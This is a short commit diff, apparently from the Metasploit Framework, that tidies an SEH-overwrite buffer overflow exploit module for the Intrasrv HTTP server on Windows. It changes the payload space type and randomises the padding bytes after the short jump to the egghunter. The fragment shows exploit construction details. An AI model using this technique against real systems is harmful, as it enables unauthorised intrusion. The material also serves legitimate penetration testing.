Additional cleanup

Author: neinwechter

modules/exploits/windows/http/intrasrv_bof.rb

@@ -37,7 +37,7 @@ def initialize(info={})
 				],
 			'Payload'        =>
 				{
-					'Space' => '4660',
+					'Space' => 4660,
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@@ -92,7 +92,7 @@ def exploit
 		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
 		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
-		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
+		buf << "\xeb\x80" + rand_text(2)			# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
 		# second last byte of payload/egg gets corrupted - pad 2 bytes